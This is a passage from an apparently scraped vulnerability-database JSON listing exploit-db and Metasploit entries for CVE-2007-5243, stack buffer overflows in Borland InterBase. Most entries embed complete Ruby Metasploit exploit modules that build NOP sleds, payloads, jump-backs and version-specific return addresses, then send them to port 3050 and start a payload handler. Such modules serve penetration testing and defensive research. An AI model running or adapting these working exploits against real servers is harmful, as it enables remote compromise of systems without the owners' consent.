}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x004038b1 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0',\r\n\t\t\t\t\t\t{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x004038b1 }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00404a10 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V5.5.0.742',\r\n\t\t\t\t\t\t{ 'Length' => [ 2216, 2120 ], 'Ret' => 0x00404a10 }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00404a0e pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V5.1.1.680',\r\n\t\t\t\t\t\t{ 'Length' => [ 2120, 2124 ], 'Ret' => 0x00404a0e }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# Debug\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Debug',\r\n\t\t\t\t\t\t{ 'Length' => [ 2120 ], 'Ret' => 0xaabbccdd }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\r\n\tend\r\n\r\n\tdef exploit_target(target)\r\n\r\n\t\ttarget['Length'].each do |length|\r\n\r\n\t\t\tconnect\r\n\r\n\t\t\t# Attach database\r\n\t\t\top_attach = 19\r\n\r\n\t\t\t# Create database\r\n\t\t\top_create = 20\r\n\r\n\t\t\t# Service attach\r\n\t\t\top_service_attach = 82\r\n\r\n\t\t\tremainder = length.remainder(4)\r\n\t\t\tpadding = 0\r\n\r\n\t\t\tif remainder > 0\r\n\t\t\t\tpadding = (4 - remainder)\r\n\t\t\tend\r\n\r\n\t\t\tbuf = ''\r\n\r\n\t\t\t# Operation/packet type\r\n\t\t\tbuf << [op_service_attach].pack('N')\r\n\r\n\t\t\t# Id\r\n\t\t\tbuf << [0].pack('N')\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [length].pack('N')\r\n\r\n\t\t\t# Nop block\r\n\t\t\tbuf << make_nops(length - payload.encoded.length - 13)\r\n\r\n\t\t\t# Payload\r\n\t\t\tbuf << payload.encoded\r\n\r\n\t\t\t# Jump back into the nop block\r\n\t\t\tbuf << \"\\xe9\" + [-1028].pack('V')\r\n\r\n\t\t\t# Jump back\r\n\t\t\tbuf << \"\\xeb\" + [-7].pack('c')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(2)\r\n\r\n\t\t\t# Target\r\n\t\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t\t# Padding\r\n\t\t\tbuf << \"\\x00\" * padding\r\n\r\n\t\t\t# Database parameter block\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [1024].pack('N')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(1024)\r\n\r\n\t\t\tsock.put(buf)\r\n\r\n\t\t\tselect(nil,nil,nil,4)\r\n\r\n\t\t\thandler\r\n\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16449/"}, {"lastseen": "2016-02-02T06:38:01", "description": "Borland InterBase PWD_db_aliased() Buffer Overflow. CVE-2007-5243. Remote exploit for linux platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Borland InterBase PWD_db_aliased Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16839", "href": "https://www.exploit-db.com/exploits/16839/", "sourceData": "##\r\n# $Id: ib_pwd_db_aliased.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Borland InterBase PWD_db_aliased() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted attach request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'linux',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38607' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t# 0x0804cbe4 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',\r\n\t\t\t\t\t\t{ 'Ret' => 0x0804cbe4 }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\t# Attach database\r\n\t\top_attach = 19\r\n\r\n\t\tlength = 1152\r\n\t\tremainder = length.remainder(4)\r\n\t\tpadding = 0\r\n\r\n\t\tif remainder > 0\r\n\t\t\tpadding = (4 - remainder)\r\n\t\tend\r\n\r\n\t\tbuf = ''\r\n\r\n\t\t# Operation/packet type\r\n\t\tbuf << [op_attach].pack('N')\r\n\r\n\t\t# Id\r\n\t\tbuf << [0].pack('N')\r\n\r\n\t\t# Length\r\n\t\tbuf << [length].pack('N')\r\n\r\n\t\t# It will return into this nop block\r\n\t\tbuf << make_nops(length - payload.encoded.length - 4)\r\n\r\n\t\t# Payload\r\n\t\tbuf << payload.encoded\r\n\r\n\t\t# Target\r\n\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t# Padding\r\n\t\tbuf << \"\\x00\" * padding\r\n\r\n\t\t# Length\r\n\t\tbuf << [1024].pack('N')\r\n\r\n\t\t# Random alpha data\r\n\t\tbuf << rand_text_alpha(1024)\r\n\r\n\t\tsock.put(buf)\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16839/"}, {"lastseen": "2016-02-02T06:38:43", "description": "Borland InterBase jrd8_create_database() Buffer Overflow. CVE-2007-5243. Remote exploit for linux platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Borland InterBase jrd8_create_database Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16843", "href": "https://www.exploit-db.com/exploits/16843/", "sourceData": "##\r\n# $Id: ib_jrd8_create_database.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Borland InterBase jrd8_create_database() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted create request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'linux',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38606' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 128,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t# 0x0804cbe4 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',\r\n\t\t\t\t\t\t{ 'Ret' => 0x0804cbe4 }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\t# Create database\r\n\t\top_create = 20\r\n\r\n\t\tlength = 544\r\n\t\tremainder = length.remainder(4)\r\n\t\tpadding = 0\r\n\r\n\t\tif remainder > 0\r\n\t\t\tpadding = (4 - remainder)\r\n\t\tend\r\n\r\n\t\tbuf = ''\r\n\r\n\t\t# Operation/packet type\r\n\t\tbuf << [op_create].pack('N')\r\n\r\n\t\t# Id\r\n\t\tbuf << [0].pack('N')\r\n\r\n\t\t# Length\r\n\t\tbuf << [length].pack('N')\r\n\r\n\t\t# It will return into this nop block\r\n\t\tbuf << make_nops(length - payload.encoded.length - 4)\r\n\r\n\t\t# Payload\r\n\t\tbuf << payload.encoded\r\n\r\n\t\t# Target\r\n\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t# Padding\r\n\t\tbuf << \"\\x00\" * padding\r\n\r\n\t\t# Database parameter block\r\n\r\n\t\t# Length\r\n\t\tbuf << [1024 * 32].pack('N')\r\n\r\n\t\t# Random alpha data\r\n\t\tbuf << rand_text_alpha(1024 * 32)\r\n\r\n\t\tsock.put(buf)\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16843/"}, {"lastseen": "2016-02-02T06:38:53", "description": "Borland InterBase INET_connect() Buffer Overflow. CVE-2007-5243. Remote exploit for linux platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Borland InterBase INET_connect Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16844", "href": "https://www.exploit-db.com/exploits/16844/", "sourceData": "##\r\n# $Id: ib_inet_connect.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Borland InterBase INET_connect() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted service attach request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'linux',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38605' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t# 0x0804d2ee 5b5e5f5dc3\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',\r\n\t\t\t\t\t\t{ 'Ret' => 0x0804d2ee }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\t# Attach database\r\n\t\top_attach = 19\r\n\r\n\t\t# Create database\r\n\t\top_create = 20\r\n\r\n\t\t# Service attach\r\n\t\top_service_attach = 82\r\n\r\n\t\tlength = 161\r\n\t\tremainder = length.remainder(4)\r\n\t\tpadding = 0\r\n\r\n\t\tif remainder > 0\r\n\t\t\tpadding = (4 - remainder)\r\n\t\tend\r\n\r\n\t\tbuf = ''\r\n\r\n\t\t# Operation/packet type\r\n\t\tbuf << [op_service_attach].pack('N')\r\n\r\n\t\t# Id\r\n\t\tbuf << [0].pack('N')\r\n\r\n\t\t# Length\r\n\t\tbuf << [length].pack('N')\r\n\r\n\t\t# Random alpha data\r\n\t\tbuf << rand_text_alpha(length - 5)\r\n\r\n\t\t# Target\r\n\t\tbuf << [target.ret].pack('L')\r\n\r\n\t\t# Separator\r\n\t\tbuf << ':'\r\n\r\n\t\t# Padding\r\n\t\tbuf << \"\\x00\" * padding\r\n\r\n\t\t# Database parameter block\r\n\r\n\t\t# Length\r\n\t\tbuf << [1024].pack('N')\r\n\r\n\t\t# It will return into this nop block\r\n\t\tbuf << make_nops(1024 - payload.encoded.length)\r\n\r\n\t\t# Payload\r\n\t\tbuf << payload.encoded\r\n\r\n\t\tsock.put(buf)\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16844/"}, {"lastseen": "2016-02-01T11:36:59", "description": "Borland InterBase 2007 PWD_db_aliased Buffer Overflow. CVE-2007-5243. Remote exploit for linux platform", "published": "2007-10-03T00:00:00", "type": "exploitdb", "title": "Borland InterBase 2007 - PWD_db_aliased Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2007-10-03T00:00:00", "id": "EDB-ID:9954", "href": "https://www.exploit-db.com/exploits/9954/", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Borland InterBase PWD_db_aliased() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted attach request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision$',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'linux',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38607' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t# 0x0804cbe4 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',\r\n\t\t\t\t\t\t{ 'Ret' => 0x0804cbe4 }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\t# Attach database\r\n\t\top_attach = 19\r\n\r\n\t\tlength = 1152\r\n\t\tremainder = length.remainder(4)\r\n\t\tpadding = 0\r\n\r\n\t\tif remainder > 0\r\n\t\t\tpadding = (4 - remainder)\r\n\t\tend\r\n\r\n\t\tbuf = ''\r\n\r\n\t\t# Operation/packet type\r\n\t\tbuf << [op_attach].pack('N')\r\n\r\n\t\t# Id\r\n\t\tbuf << [0].pack('N')\r\n\r\n\t\t# Length\r\n\t\tbuf << [length].pack('N')\r\n\r\n\t\t# It will return into this nop block\r\n\t\tbuf << make_nops(length - payload.encoded.length - 4)\r\n\r\n\t\t# Payload\r\n\t\tbuf << payload.encoded\r\n\r\n\t\t# Target\r\n\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t# Padding\r\n\t\tbuf << \"\\x00\" * padding\r\n\r\n\t\t# Length\r\n\t\tbuf << [1024].pack('N')\r\n\r\n\t\t# Random alpha data\r\n\t\tbuf << rand_text_alpha(1024)\r\n\r\n\t\tsock.put(buf)\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9954/"}], "metasploit": [{"lastseen": "2020-10-06T05:16:45", "description": "This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Firebird Relational Database isc_attach_database() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/WINDOWS/MISC/FB_ISC_ATTACH_DATABASE", "href": "", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/fb_isc_attach_database.rb"}, {"lastseen": "2020-03-23T19:49:28", "description": "This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request.\n", "published": "2007-10-04T03:03:13", "type": "metasploit", "title": "Borland InterBase isc_create_database() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/MISC/IB_ISC_CREATE_DATABASE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::BruteTargets\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'Borland InterBase isc_create_database() Buffer Overflow',\n 'Description'\t=> %q{\n This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.\n },\n 'Author'\t=>\n [\n 'Ramon de C Valle',\n 'Adriano Lima <adriano[at]risesecurity.org>',\n ],\n 'Arch'\t\t=> ARCH_X86,\n 'Platform'\t=> 'win',\n 'References'\t=>\n [\n [ 'CVE', '2007-5243' ],\n [ 'OSVDB', '38606' ],\n [ 'BID', '25917' ],\n [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\n ],\n 'Privileged'\t=> true,\n 'License'\t=> MSF_LICENSE,\n 'Payload'\t=>\n {\n 'Space' => 512,\n 'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\n 'StackAdjustment' => -3500,\n },\n 'Targets'\t=>\n [\n [ 'Brute Force', { } ],\n # 0x00403d4b pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V8.1.0.257',\n { 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403d4b }\n ],\n # 0x00403d4d pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V8.0.0.123',\n { 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403d4d }\n ],\n # 0x00403a5d pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80',\n { 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403a5d }\n ],\n # 0x004038fd pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V7.0.1.1',\n { 'Length' => [ 2116, 2120 ], 'Ret' => 0x004038fd }\n ],\n # 0x0040390d pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V6.5.0.28',\n { 'Length' => [ 1332, 1336 ], 'Ret' => 0x0040390d }\n ],\n # 0x00403901 pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V6.0.1.6',\n { 'Length' => [ 1332, 1336 ], 'Ret' => 0x00403901 }\n ],\n # 0x004038b1 pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0',\n { 'Length' => [ 1332, 1336 ], 'Ret' => 0x004038b1 }\n ],\n # 0x00404a10 pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V5.5.0.742',\n { 'Length' => [ 1432, 1436 ], 'Ret' => 0x00404a10 }\n ],\n # 0x00404a0e pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V5.1.1.680',\n { 'Length' => [ 1336, 1340 ], 'Ret' => 0x00404a0e }\n ],\n # Debug\n [\n 'Debug',\n { 'Length' => [ 1336 ], 'Ret' => 0xaabbccdd }\n ],\n ],\n 'DefaultTarget'\t=> 0,\n 'DisclosureDate' => 'Oct 03 2007'\n ))\n\n register_options(\n [\n Opt::RPORT(3050)\n ],\n self.class\n )\n\n end\n\n def exploit_target(target)\n\n target['Length'].each do |length|\n\n connect\n\n # Create database\n op_create = 20\n\n remainder = length.remainder(4)\n padding = 0\n\n if remainder > 0\n padding = (4 - remainder)\n end\n\n buf = ''\n\n # Operation/packet type\n buf << [op_create].pack('N')\n\n # Id\n buf << [0].pack('N')\n\n # Length\n buf << [length].pack('N')\n\n # Nop block\n buf << make_nops(length - payload.encoded.length - 13)\n\n # Payload\n buf << payload.encoded\n\n # Jump back into the nop block\n buf << \"\\xe9\" + [-1028].pack('V')\n\n # Jump back\n buf << \"\\xeb\" + [-7].pack('c')\n\n # Random alpha data\n buf << rand_text_alpha(2)\n\n # Target\n buf << [target.ret].pack('V')\n\n # Padding\n buf << \"\\x00\" * padding\n\n # Database parameter block\n\n # Length\n buf << [1024].pack('N')\n\n # Random alpha data\n buf << rand_text_alpha(1024)\n\n sock.put(buf)\n\n select(nil,nil,nil,4)\n\n handler\n\n end\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/ib_isc_create_database.rb"}, {"lastseen": "2020-10-06T05:32:10", "description": "This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request.\n", "published": "2007-10-04T03:03:13", "type": "metasploit", "title": "Borland InterBase jrd8_create_database() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/LINUX/MISC/IB_JRD8_CREATE_DATABASE", "href": "", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/ib_jrd8_create_database.rb"}, {"lastseen": "2020-10-06T05:12:53", "description": "This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Borland InterBase PWD_db_aliased() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/LINUX/MISC/IB_PWD_DB_ALIASED", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'Borland InterBase PWD_db_aliased() Buffer Overflow',\n 'Description'\t=> %q{\n This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted attach request.\n },\n 'Author'\t=>\n [\n 'Ramon de C Valle',\n 'Adriano Lima <adriano[at]risesecurity.org>',\n ],\n 'Arch'\t\t=> ARCH_X86,\n 'Platform'\t=> 'linux',\n 'References'\t=>\n [\n [ 'CVE', '2007-5243' ],\n [ 'OSVDB', '38607' ],\n [ 'BID', '25917' ],\n [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\n ],\n 'Privileged'\t=> true,\n 'License'\t=> MSF_LICENSE,\n 'Payload'\t=>\n {\n 'Space' => 512,\n 'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\n },\n 'Targets'\t=>\n [\n # 0x0804cbe4 pop esi; pop ebp; ret\n [\n 'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',\n { 'Ret' => 0x0804cbe4 }\n ],\n ],\n 'DefaultTarget'\t=> 0,\n 'DisclosureDate' => 'Oct 03 2007'\n ))\n\n register_options(\n [\n 